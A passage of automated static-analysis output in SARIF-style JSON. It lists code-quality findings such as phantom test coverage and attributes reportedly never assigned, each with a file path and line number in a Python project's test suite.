"fp|b2daa29986254e47d8f7a0dbb85024347d2b5fe7308d47d73ae3c94e632ee36e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_canary_fixtures.py"}, "region": {"startLine": 51}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_loopback_redirect_handler_rejects_remote_redirect"}, "properties": {"repobilityId": 144926, "scanner": "repobility-ast-engine", "fingerprint": "974693b7369b4d9fb5eed55d1fc1d38fcf9a8f6818bc0ef98afc4ff4e9f594b2", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|974693b7369b4d9fb5eed55d1fc1d38fcf9a8f6818bc0ef98afc4ff4e9f594b2"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_claude_daemon_hook_bridge.py"}, "region": {"startLine": 120}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_daemon_url_rejects_non_loopback_fallback"}, "properties": {"repobilityId": 144925, "scanner": "repobility-ast-engine", "fingerprint": "ee4800be8f2853953b1e478ed15bd53b5192b281b64d4d039bd2695bc146cda0", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ee4800be8f2853953b1e478ed15bd53b5192b281b64d4d039bd2695bc146cda0"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_claude_daemon_hook_bridge.py"}, "region": {"startLine": 47}}}]}, {"ruleId": "MINED106", "level": "error", "message": 
{"text": "Phantom test coverage: test_assert_loopback_http_url_rejects_remote_host"}, "properties": {"repobilityId": 144924, "scanner": "repobility-ast-engine", "fingerprint": "ef4637220e7c685d039ae3a5513b28b923dd8f3ed1bb2cd41d169e3385df46c1", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ef4637220e7c685d039ae3a5513b28b923dd8f3ed1bb2cd41d169e3385df46c1"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_claude_daemon_hook_bridge.py"}, "region": {"startLine": 42}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_insight_is_frozen"}, "properties": {"repobilityId": 144923, "scanner": "repobility-ast-engine", "fingerprint": "4c234395732bc497364d965585a34b1a0a16e0e9a6574862e785b9643e6f9afa", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4c234395732bc497364d965585a34b1a0a16e0e9a6574862e785b9643e6f9afa"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_insights.py"}, "region": {"startLine": 138}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_version_flag"}, "properties": {"repobilityId": 144922, "scanner": "repobility-ast-engine", "fingerprint": "b2076a8cf55064722129ec837af8d5203b28cdabe9e3321947bf29ce5eaa133f", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", 
"verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b2076a8cf55064722129ec837af8d5203b28cdabe9e3321947bf29ce5eaa133f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_cli.py"}, "region": {"startLine": 251}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_migration_idempotent_double_index_creation"}, "properties": {"repobilityId": 144921, "scanner": "repobility-ast-engine", "fingerprint": "be2cd2024646199808e5961f7ecb8147d01e921da307ebcc92f277e8262bd581", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|be2cd2024646199808e5961f7ecb8147d01e921da307ebcc92f277e8262bd581"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_approval_store_scale.py"}, "region": {"startLine": 584}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_indexes_execute_without_error"}, "properties": {"repobilityId": 144920, "scanner": "repobility-ast-engine", "fingerprint": "1e0a178fc6b06f096b3ce5dbc07251077db77d452f34549704d680fe769ce8ab", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": 
"fp|1e0a178fc6b06f096b3ce5dbc07251077db77d452f34549704d680fe769ce8ab"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_approval_store_scale.py"}, "region": {"startLine": 161}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_sync_supply_chain_bundle_wraps_runtime_error_when_cached_bundle_refetch_fails"}, "properties": {"repobilityId": 144918, "scanner": "repobility-ast-engine", "fingerprint": "c6a10fdf6f87cdee5de26a4bb284684f50c44502d2f33c03646213dc7287a13d", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|c6a10fdf6f87cdee5de26a4bb284684f50c44502d2f33c03646213dc7287a13d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_supply_chain_sync.py"}, "region": {"startLine": 781}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_scan_output_with_multiple_integrations_matches_schema"}, "properties": {"repobilityId": 144914, "scanner": "repobility-ast-engine", "fingerprint": "ced5882e7dc3388f41fd1bfaddefda18f0c2887268a18c2fd162808be69ca89b", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ced5882e7dc3388f41fd1bfaddefda18f0c2887268a18c2fd162808be69ca89b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_schema_contracts.py"}, "region": {"startLine": 40}}}]}, {"ruleId": 
"MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_composition_result_is_frozen"}, "properties": {"repobilityId": 144913, "scanner": "repobility-ast-engine", "fingerprint": "0b6f8a18a7b29d5910796cb5fcc49c295dabb07ca3439ffd6ed65ed27ca2196f", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|0b6f8a18a7b29d5910796cb5fcc49c295dabb07ca3439ffd6ed65ed27ca2196f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_bypass_detector.py"}, "region": {"startLine": 216}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_send_websocket_handshake_rejects_oversized_headers_before_marker"}, "properties": {"repobilityId": 144905, "scanner": "repobility-ast-engine", "fingerprint": "a3fa9248212144b26c6ab24edd96abc2843bb9cf2638f9960061d33d379f1b14", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|a3fa9248212144b26c6ab24edd96abc2843bb9cf2638f9960061d33d379f1b14"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_codex_app_server.py"}, "region": {"startLine": 37}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_read_websocket_frame_rejects_oversized_payload_before_reading"}, "properties": {"repobilityId": 144904, "scanner": "repobility-ast-engine", "fingerprint": 
"c4a7d7faf531440d037e08d742778c4228fbf0b66e584f474b5b4af3c71e804b", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|c4a7d7faf531440d037e08d742778c4228fbf0b66e584f474b5b4af3c71e804b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_codex_app_server.py"}, "region": {"startLine": 30}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_normalize_harness_payload_rejects_unknown_harness"}, "properties": {"repobilityId": 144901, "scanner": "repobility-ast-engine", "fingerprint": "6090cb1c4c8f86c6974f5c6b856f05effb7ae4b4fb575d3f4db8da6983da89e4", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|6090cb1c4c8f86c6974f5c6b856f05effb7ae4b4fb575d3f4db8da6983da89e4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime_action_harnesses.py"}, "region": {"startLine": 308}}}]}, {"ruleId": "MINED106", "level": "error", "message": {"text": "Phantom test coverage: test_result_is_frozen"}, "properties": {"repobilityId": 144899, "scanner": "repobility-ast-engine", "fingerprint": "c0b07235351aec0a0b86a14e16a22873dab8dbabb2383a4d9f76073a15394497", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "phantom-test-coverage", "owasp": 
null, "cwe_ids": ["CWE-1126"], "languages": ["python"], "observations_count": 982154}, "scanner": "repobility-ast-engine", "correlation_key": "fp|c0b07235351aec0a0b86a14e16a22873dab8dbabb2383a4d9f76073a15394497"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_redaction.py"}, "region": {"startLine": 113}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.send_header` used but never assigned in __init__"}, "properties": {"repobilityId": 144898, "scanner": "repobility-ast-engine", "fingerprint": "8c2df6f4379cf7b394845f67bc78a3ef7f27a4ca3b7801688dd1cb362a57cead", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|8c2df6f4379cf7b394845f67bc78a3ef7f27a4ca3b7801688dd1cb362a57cead"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 86}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.send_response` used but never assigned in __init__"}, "properties": {"repobilityId": 144897, "scanner": "repobility-ast-engine", "fingerprint": "0978b964b76bdd5802ee44baf0f36dc03af7d972ea796e74e042d11817bb259a", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|0978b964b76bdd5802ee44baf0f36dc03af7d972ea796e74e042d11817bb259a"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, 
"region": {"startLine": 85}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.headers` used but never assigned in __init__"}, "properties": {"repobilityId": 144896, "scanner": "repobility-ast-engine", "fingerprint": "905903462ac25417f499e3206499d7161525ad2190af3c7a56e707195fa6dc57", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|905903462ac25417f499e3206499d7161525ad2190af3c7a56e707195fa6dc57"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 51}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.wfile` used but never assigned in __init__"}, "properties": {"repobilityId": 144895, "scanner": "repobility-ast-engine", "fingerprint": "94691fda0a0d230926341ab28dca6ff427969539316ccb24745017744a78b573", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|94691fda0a0d230926341ab28dca6ff427969539316ccb24745017744a78b573"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 59}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.path` used but never assigned in __init__"}, "properties": {"repobilityId": 144894, "scanner": "repobility-ast-engine", "fingerprint": "5dc6c01af72176424c66a305da22d3f043d507cbf64d87b0d1805f3985e026b8", "category": 
"quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5dc6c01af72176424c66a305da22d3f043d507cbf64d87b0d1805f3985e026b8"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 54}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.rfile` used but never assigned in __init__"}, "properties": {"repobilityId": 144893, "scanner": "repobility-ast-engine", "fingerprint": "b2ca698ead7938498db79acafa86d1e9a864662b96b875c8df9d61238e399583", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b2ca698ead7938498db79acafa86d1e9a864662b96b875c8df9d61238e399583"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 45}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.headers` used but never assigned in __init__"}, "properties": {"repobilityId": 144892, "scanner": "repobility-ast-engine", "fingerprint": "9ec5d35e641ba4b246fe94fbab8e356be5ead54a01f0c93aec722f1d74606bb4", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", 
"correlation_key": "fp|9ec5d35e641ba4b246fe94fbab8e356be5ead54a01f0c93aec722f1d74606bb4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 44}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.wfile` used but never assigned in __init__"}, "properties": {"repobilityId": 144891, "scanner": "repobility-ast-engine", "fingerprint": "a5176e0852630127b8e16e223830c33699fa0b6be3de2302465ab94fa3a5f630", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|a5176e0852630127b8e16e223830c33699fa0b6be3de2302465ab94fa3a5f630"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 74}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.path` used but never assigned in __init__"}, "properties": {"repobilityId": 144890, "scanner": "repobility-ast-engine", "fingerprint": "0fe5fe3f414382d132c4333369442e77e4440573019eff8d01d36a8bace819f8", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|0fe5fe3f414382d132c4333369442e77e4440573019eff8d01d36a8bace819f8"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 61}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.path` used but never assigned 
in __init__"}, "properties": {"repobilityId": 144889, "scanner": "repobility-ast-engine", "fingerprint": "932963399a374e8cf44b6d13ead0017214aec692aa9808e79642832b8f6251ae", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|932963399a374e8cf44b6d13ead0017214aec692aa9808e79642832b8f6251ae"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 49}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.end_headers` used but never assigned in __init__"}, "properties": {"repobilityId": 144888, "scanner": "repobility-ast-engine", "fingerprint": "5c602c8f4df09f286aa534341ff84bbebdee77992245771cab8dda682d9dc6de", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5c602c8f4df09f286aa534341ff84bbebdee77992245771cab8dda682d9dc6de"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 57}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.send_header` used but never assigned in __init__"}, "properties": {"repobilityId": 144887, "scanner": "repobility-ast-engine", "fingerprint": "e5fd20d0b6bafa0f624405db74bc1222a703ad37c829d52ae540b600513ccf5f", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", 
"evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|e5fd20d0b6bafa0f624405db74bc1222a703ad37c829d52ae540b600513ccf5f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 56}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.send_response` used but never assigned in __init__"}, "properties": {"repobilityId": 144886, "scanner": "repobility-ast-engine", "fingerprint": "9d464c5ef0e1c8e3cc4f3f6cb7b58bbc220cbcb1ded21621818028f477521c4e", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|9d464c5ef0e1c8e3cc4f3f6cb7b58bbc220cbcb1ded21621818028f477521c4e"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_event_schema_v1.py"}, "region": {"startLine": 55}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.rfile` used but never assigned in __init__"}, "properties": {"repobilityId": 144885, "scanner": "repobility-ast-engine", "fingerprint": "d893aeb73920d18427f5479482dc7f343c6be41ff10345269e3f53a247c8e26a", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|d893aeb73920d18427f5479482dc7f343c6be41ff10345269e3f53a247c8e26a"}}, "locations": 
[{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_protect.py"}, "region": {"startLine": 34}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.headers` used but never assigned in __init__"}, "properties": {"repobilityId": 144884, "scanner": "repobility-ast-engine", "fingerprint": "f3e6492f5060e6ee6c0fac2981a70dac42f83da400809d7f08b4fbd80a7242bc", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|f3e6492f5060e6ee6c0fac2981a70dac42f83da400809d7f08b4fbd80a7242bc"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_protect.py"}, "region": {"startLine": 32}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.wfile` used but never assigned in __init__"}, "properties": {"repobilityId": 144883, "scanner": "repobility-ast-engine", "fingerprint": "71bc94a8fbbbfeda5b207f600b174d420e415ba2c6e54a54a8c525c83d79b98d", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|71bc94a8fbbbfeda5b207f600b174d420e415ba2c6e54a54a8c525c83d79b98d"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_protect.py"}, "region": {"startLine": 38}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.end_headers` used but never assigned in __init__"}, "properties": {"repobilityId": 144882, "scanner": "repobility-ast-engine", "fingerprint": 
"52fb78b59169961a56ea6ef000572dc55f3d0bbabacefff9e7ae69abd4a6429c", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|52fb78b59169961a56ea6ef000572dc55f3d0bbabacefff9e7ae69abd4a6429c"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_protect.py"}, "region": {"startLine": 37}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.send_header` used but never assigned in __init__"}, "properties": {"repobilityId": 144881, "scanner": "repobility-ast-engine", "fingerprint": "80a4a5dbd05e3e756be7dbd190cf88420f355647561e4cb7cce1132889931f7f", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|80a4a5dbd05e3e756be7dbd190cf88420f355647561e4cb7cce1132889931f7f"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_protect.py"}, "region": {"startLine": 36}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self.send_response` used but never assigned in __init__"}, "properties": {"repobilityId": 144880, "scanner": "repobility-ast-engine", "fingerprint": "0480a6debac668e00f2c02c982ab685322065fb3363516ae44224ef9dac76bd9", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": 
["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|0480a6debac668e00f2c02c982ab685322065fb3363516ae44224ef9dac76bd9"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_protect.py"}, "region": {"startLine": 35}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self._benign_fixtures` used but never assigned in __init__"}, "properties": {"repobilityId": 144879, "scanner": "repobility-ast-engine", "fingerprint": "771aa07fe396736ced9a485077dec66198d10dbdfaee36f32546494b9817f0aa", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|771aa07fe396736ced9a485077dec66198d10dbdfaee36f32546494b9817f0aa"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_red_team.py"}, "region": {"startLine": 158}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self._benign_fixtures` used but never assigned in __init__"}, "properties": {"repobilityId": 144878, "scanner": "repobility-ast-engine", "fingerprint": "a57d932437d455739d84632fd83159b7ccd0521f08f5cc2edad162e007e40725", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|a57d932437d455739d84632fd83159b7ccd0521f08f5cc2edad162e007e40725"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_red_team.py"}, "region": {"startLine": 150}}}]}, {"ruleId": 
"MINED108", "level": "error", "message": {"text": "`self._benign_fixtures` used but never assigned in __init__"}, "properties": {"repobilityId": 144877, "scanner": "repobility-ast-engine", "fingerprint": "c35b61f6fd236aa7160e0f3a77b74b75b09c5adab9d1553bf3be3479979a64d7", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|c35b61f6fd236aa7160e0f3a77b74b75b09c5adab9d1553bf3be3479979a64d7"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_red_team.py"}, "region": {"startLine": 143}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self._malicious_fixtures` used but never assigned in __init__"}, "properties": {"repobilityId": 144876, "scanner": "repobility-ast-engine", "fingerprint": "9307483059cb25282cc3acc829465c7a9fb96dae5ddc27c969be267107a9d3e1", "category": "quality", "severity": "high", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "self-attr-never-set", "owasp": null, "cwe_ids": ["CWE-476"], "languages": ["python"], "observations_count": 25998}, "scanner": "repobility-ast-engine", "correlation_key": "fp|9307483059cb25282cc3acc829465c7a9fb96dae5ddc27c969be267107a9d3e1"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_red_team.py"}, "region": {"startLine": 125}}}]}, {"ruleId": "MINED108", "level": "error", "message": {"text": "`self._malicious_fixtures` used but never assigned in __init__"}, "properties": {"repobilityId": 144875, "scanner": "repobility-ast-engine", "fingerprint": 